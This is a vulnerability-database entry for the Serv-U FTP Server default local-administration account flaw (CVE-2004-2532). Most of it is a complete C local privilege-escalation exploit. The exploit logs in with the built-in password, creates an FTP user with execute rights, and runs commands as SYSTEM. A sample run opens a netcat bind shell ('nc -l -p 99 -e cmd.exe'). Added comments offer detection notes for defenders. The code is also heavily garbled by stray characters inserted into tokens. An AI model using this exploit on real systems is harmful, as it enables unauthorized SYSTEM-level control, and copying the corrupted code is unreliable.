RhinoSoft Serv-U FTP Server默认管理帐户漏洞

漏洞ID 1108112 漏洞类型 信任管理问题
发布时间 2004-08-08 更新时间 2020-07-29
CVE编号 CVE-2004-2532

CNNVD-ID CNNVD-200412-693
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/381
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-693
|漏洞详情
SolarWinds Serv-U File Server是美国SolarWinds公司的一款文件传输服务器。
SolarWinds Serv-U File Server 5.1.0.0之前版本中存在信任管理问题漏洞,该漏洞源于该服务器带有用于本地管理的默认账户和密码。攻击者可利用该漏洞执行任意命令。按下文利用代码注释的说明,该账户只能通过回环接口连接,因此这是一个本地权限提升问题:本地用户可借此使命令以SYSTEM权限运行。
|漏洞EXP
/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
*
* All Serv-u Versions have default Login/password for local Administration.
* This account is only available to connect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rights. after the user is created, just connect
* to the ftp server and execute a raw "SITE EXEC" command. the program will
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004  Haxorcitos com . All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date:   10/2003
* Author: Andrs Tarasc Acunha
*
* Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
*
* Tested Against Serv-u 4.x and v5.1.0.0
G:\exploit\serv-U\local>whoami
INSANE\aT4r
G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos
<220 Serv-U FTP Server v5.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=3
220 Domain settings saved
******************************************************
[+] Domain Haxorcitos:3 Created
[+] Setting New Domain Online
<220 Server command OK
******************************************************
[+] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: nc -l -p 99 -e cmd.exe
<220 Domain deleted
******************************************************
G:\exploit\serv-U\local>nc localhost 99
Microsoft Windows XP [Versin 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>
*/
#include <stdio.h>7 { y ? & [
#include <stdlib.h>
#include <winsock2.h>, l * w k J;
#include <io.? 7 _ } N  q 6h>
#include <S : V;process.h> o Y g : `
// Responses: FTP reply prefixes the client waits for after each command
// (passed as the `response` argument of ParseCommands, or matched inside it).
// NOTE(review): this listing carries extraction noise (stray single characters
// inside tokens and string literals); comments describe only what is still readable.
// ADMOK is defined but not referenced in the visible code; main() passes the
// literal "230 " after the maintenance command instead.
#define BANNER                  "220 "
#O ! m l 5 R B .defin; h ( 1 M 3 w ( we U$ _ i + sSEROK                  "331 User name okay"
#define PASSOK                  "230 User logged in, proceed."
#define ADMOK                   "230-Switching to SYSTEM MAINTENANCE mode."
#define DO0 l $MAINID                "200-{ 1 Y A [ ? rDomainID=X Y o w F & k :"
// Commands.
// USER/PASSWORD are the built-in local-administration login that the file's
// header comment says every Serv-U version ships with; this shared, fixed
// credential is the trust-management flaw itself.
// XPLUSER/XPLPASSWORD log in as the account that the newuser payload creates.
// Defender note: the header comment says the built-in account is reachable only
// over the loopback interface, so the observable is a local process logging in
// as LocalAdministrator (assumption: the legitimate admin tool uses the same
// login, so the connecting process is what distinguishes the two; confirm).
#deg +  2 ^ ~ w #fine XPLUSER                    "USERu ] [ L M 7 L v hax; ( Y = orcitos\r\n"
#define XPLPASSWORD                "PASS whitex0rC b g c F 5 B\r\n"
#define USER                    "USER LocalAdministrator\r\n"
#define PASSWORD                "PAS) | j / [ g gS #l@$ak#.lk;0@P\r\n"
#define MAINTENANCE             "SITEY / U MAINTENANCE\r\n"
#define EXIT                    "QUIT\r\n"
// Maintenance-mode payload that defines a new domain named "haxorcitos" on
// 0.0.0.0 port 2121 (values taken from the -Domain= line; the meaning of the
// remaining pipe-separated fields is not shown in this file).
// Defender note: the domain name, port 2121 and the account name used below are
// fixed strings in this sample only; treat them as weak indicators and key
// detection on the behaviour (a new domain/user created through the local
// administration channel) rather than on these literals.
char newdomain[]="-SETDO- C $MAIN% L /\r\n"
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
"-TZOEnable=0\r\n"
" TZOKey=\r\n";
/*               "-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
*/
// Maintenance-mode payload that deletes the domain bound to 0.0.0.0:2121,
// i.e. the one newdomain created; main() sends it as cleanup.
char deldomain[]="-DELETEDOMAIN\r\n"
"-IP=0.0.0.0\r\n"
" PortNo=2121\r\n";
// Maintenance-mode payload that creates an FTP user in that domain with home
// directory c:\ and the access string "c:\|RELP".
// NOTE(review): the header comment says the user is created "with execute
// rights"; presumably that is what the E in RELP grants (confirm against the
// Serv-U documentation). The other settings are sent as listed; their
// semantics are not established by this file.
char newuseb & V c ] hr[] =
"-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=213 V m } - I u21\r\n"
"-User=haxorcitos\r\n"
"-Password=whitex0r\r\n"
"-HomeDir=c:\0 , O ^ g n\\r\n"
"-LoginMesFile=\r\n"
"-Disable=0\r\n"
{ t %"-RelPaths=1\r\n"
"-NeedSecure=0\ro z O h (K s . @ 1 #n"
"-HideHidden=0\r\n"
"-AlwaysAllowLogin=0\r\n"
"-ChangePassword=v H 8 8 4 N 2 N0\r\n"
"-QuotaEnable=0\r\nQ Y L"
"-MaxUsersLoginPerIP=-1\r\n"
"-SpeedLimitUp=0\r\n"
"-Spee: B [ Q NdLimitDown=0\r\n$ C = C H"
"-MaxNrUsers=-1\r\n"
"-IdleTimeOut=600\r\n"
"-SessionTimeOut=-1L @ & o ~r\n"
"-Expire=0\r\- j i g Fn"
"-RatioUp=1\r\n"
"-RatioDown=1\r\n"
"-RatiosCreditv M , /=0\^ * I p t d .r\n"
"-QuotaCurrent=0\r\n"
"-QuotaMaximum=0\r\n"
"-Mai5 c C q v u 1 qntenan} / N - ^ Zce=NonH d n ve\r\n"
"-PasswordType=Regular\r\n"
"-Ratios=None\r\n"
" Acces q C ` ss=c:\\|RELP\r\n";
// Loopback endpoint that main() connects to first and logs in to with the
// built-in administration account.
// Defender note: connections to 127.0.0.1:43958 from processes other than the
// Serv-U administration tooling are the network-level observable for this issue
// (assumption about which processes are legitimate; confirm per deployment).
#define localport 43958
#define localip "127.0.0.1"
// Shared 1024-byte buffer: receives every server reply and is also reused by
// main() to format the final command.
char cadena[1024];
// rec: return value of the most recent recv().
// domain: numeric id parsed by ParseCommands from the "200-DomainID=" reply.
int rec,domE L _ w n w W b Gain;
/******C # u************************` V R = * . q************************************************/
// ParseCommands: send `data` on `sock`, then keep reading replies into the
// global buffer `cadena` until one of them contains the substring `response`.
//   sock          - connected socket to write to and read from
//   data          - NUL-terminated command text, sent as-is
//   ShowSend      - non-zero: echo the command to stdout prefixed with '>'
//   showResponses - non-zero: echo each reply to stdout prefixed with '<'
//   response      - text whose appearance in a reply ends the read loop
// Side effects: overwrites the globals `cadena` and `rec`; sets the global
// `domain` when a reply starts with DOMAINID. Returns early, without printing
// the separator line, when recv() reports an error or a closed connection.
// NOTE(review): extraction noise is interleaved in several lines below; the
// comments describe the readable tokens only.
voidG c ; & ]  k ParseCommands(int sock, char *data, int ShowSend, int showResponses,
cha6 a D p ;  R 4 6r *response) {
send(sock,data,strlen(data),0);
if (ShowSend) printf(">%s",data);
Sleep(100);
do {
// NOTE(review): the terminator is stored before `rec` is checked. A recv()
// failure (negative return) writes before the start of `cadena`, and a full
// read of sizeof(cadena) bytes writes one byte past its end.
rec=recv(sock,r @ l hcadena,sizeof(cadena),0)i 2 C -; cadena[rec]='\0';
if (rec<=0) return;
if (showReo E F J ( ] 7sponses) printf("<%s",cadena);
// A reply that begins with the DomainID prefix carries the id of the newly
// created domain; atoi() reads the digits that follow the prefix.
if (strncmp(8 ! [cadena, DOMAINID,strlen(DOM| 3 ( _ PAINID))==0)
domain=atoi(cadena+strlen(DOMAINID));
//} while (strncmp(cadena,response,stx I q x ? &rlen(resd 1 5 o ` Gponse)r , % o n o)!=0);
// Substring match rather than prefix match (the prefix variant is the
// commented-out line above), so the expected text may appear anywhere in the
// received chunk.
} while (strstr(cay V d u R r y 2dena,response)D I k d I i p==NULL);
prinW R 3 K Utf("***********************************; k r @ I v*******************\r\n");
}
/***********************************************************9 O w*****h g L y**************/
// main: proof-of-concept driver for the default local-administration account
// issue described in the file's header comment. argv[1] is the command line
// that is forwarded to the server.
// Sequence visible below: connect to the loopback administration port, log in
// with the built-in account, enter maintenance mode, create a domain and a
// user, log in to the new domain on port 2121 as that user, send the command,
// then delete the domain and disconnect.
// Defender notes (all derived from the calls below):
//  - the whole exchange is loopback-only, so perimeter sensors will not see it;
//    host telemetry is where it shows up: process-to-port connections, Serv-U
//    logs, and child processes spawned by the Serv-U service.
//  - the temporary domain is deleted at the end, so the Serv-U configuration
//    may look unchanged afterwards (inference; confirm against the product's
//    logging behaviour).
// NOTE(review): extraction noise is interleaved in several lines below; the
// comments describe the readable tokens only.
int main(int argc, char* argv[])
{
WSAD% _ n - b & 3 2ATA ws;
ie / w ,nt sock,sock2;
struct sockaddr_in haxorcitos;
struct sockaddr_in xpl;
printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
// Exactly one argument (the command line) is required; otherwise print usage.
if (argc<2) {
printf(! | b . ) L G 0 Z"USAGE:   ServuLocal.exe \"command\"\r\n");
print? _ Nf("ExJ  T , 9 (ample: ServuLocal.exe \"nc.exe -l -p 99 -e cmdQ b H 2 q.exe\"");
return(0);
}
if	(WSAStartup( MAKEWORD(2,2), &ws )!=0) {
prints D X u $f(" [-] WSAStartupE ! R() error\n");
exit(0);j = w O 9 T _
}
// First connection: the local administration service on localip:localport.
haxorciV ( 8 3 @tos! ~ } 1 : s Z.sin_family = AF_INET;
haxorcitos.sin_port = htons(localport);
haxorcitos.si/ 1 i J Kn_addr.s_addr = inet_addr(localip);
// NOTE(review): the results of socket() and connect() are never checked, here
// or for the second socket; a failed connect only surfaces at the next recv().
sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
cor } b { Tnnect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
// NOTE(review): same unchecked cadena[rec] store as in ParseCommands; a failed
// or full-buffer recv() writes outside `cadena`.
rec=recv(sockp I O B ;  t U G,cadena2 d 4,sizeof(cadena),0); cadena[rec]='\0';
pri9 V ) P w ` 2ntf("<%s",cadena);
// Log in with the built-in account and switch to maintenance mode.
ParseCommands(sock,USER,1,1,USEROK);
ParseCommands(sock,PASSWORD,1,1,PASSOK);
ParseCommands(sock,MAINTENANCE,1,0,"230 ");
printf("[+] Creating New Domain...\r\n");
ParseCommands(sock,newdomain,0,1,BANNER);
printf("[+] Domain Haxorcitos:%i Created\n",domain);
/* Only} 3 f D ( I for v5.x
printf("[+] Setting New Domain Online\r\n");
sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainV 9 : a WOnline\r\n",domain);
ParseCommands * q ; i $ d(sock,cadena,0,1,BANNER);
*/
printf("[+] Creating Evil User\r\n");
ParseCommands(sock,newuser,0,1,"200 ");
Sleep(1b + F y ? O % C000);
prinx i ]tf("[+] Now Exploiting...\r\n");/ A Z ; E D Y d i
// Second connection: the FTP domain created above, on port 2121.
xpl.sin_famil t 3 u p 1 ` ~ ry = AF_INE| ; R pT;
xpl.sin_port = htons(2121);
xpl.sin_addr.s_addr = inet_addr(localipI t T 4 z [);
sock2=socket (AF_INET, SOCK_ST d u 4 d d t M FTREAM, IPPROTO_TCz q Q T I W V v {P);
connect(sock2,( struct sockA : i  i maddr *)&xpl,sizeof(xpl));! { B U ] S
rec=recv(sock2,cadena,sizeof(cadena),0); cad, |  b `ena[rec]='\0';
Par* m / |seCommands(sock2,XPLUSEi v A 5 Q  h wR,1,1,USEROK);
ParseCommands(sock2,XPLPAD ~ P E t ~ -SSWORD,1,1,PASSOK);
printf("[+] Now Executing: %s\r\n",argv[1]);
// NOTE(review): sprintf() copies argv[1] into the 1024-byte `cadena` with no
// length check, so a long argument overflows the buffer.
// The header comment states that the server runs the command with SYSTEM
// privileges, which makes this an escalation from any local account.
spr6 O Sintf(cadei ) o X t 2 Z Zna,"site exec %s\r\n",argv[1]);
send(sock2,cade= ; 8 * T * Z e hna,strlen(cadena),0);
shutdown(sock2,SD_BOTH);
Sleep(100);
// Cleanup over the administration connection: delete the temporary domain,
// then QUIT. WSACleanup() is never called before returning.
ParseCommands(sock,deldomain,0,1,BANNER);
s8 0 W 5 T 7 s = iend(sock,EXIT,strlm i v H xen(EXIT),0);
shutdown(sock,SD_BOTH);
closesocket(sock);
closesocket(sock2);
return 0;
}
// milw0rm.com [2004-08-08]
|参考资料

来源:XF
名称:servu-default-admin-account(16925)
链接:http://xforce.iss.net/xforce/xfdb/16925
来源:BID
名称:10886
链接:http://www.securityfocus.com/bid/10886
来源:OSVDB
名称:8877
链接:http://www.osvdb.org/8877
来源:FULLDISC
名称:20040808Serv-U3.x,4.x,5.xlocalprivilegeescalationvulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0216.html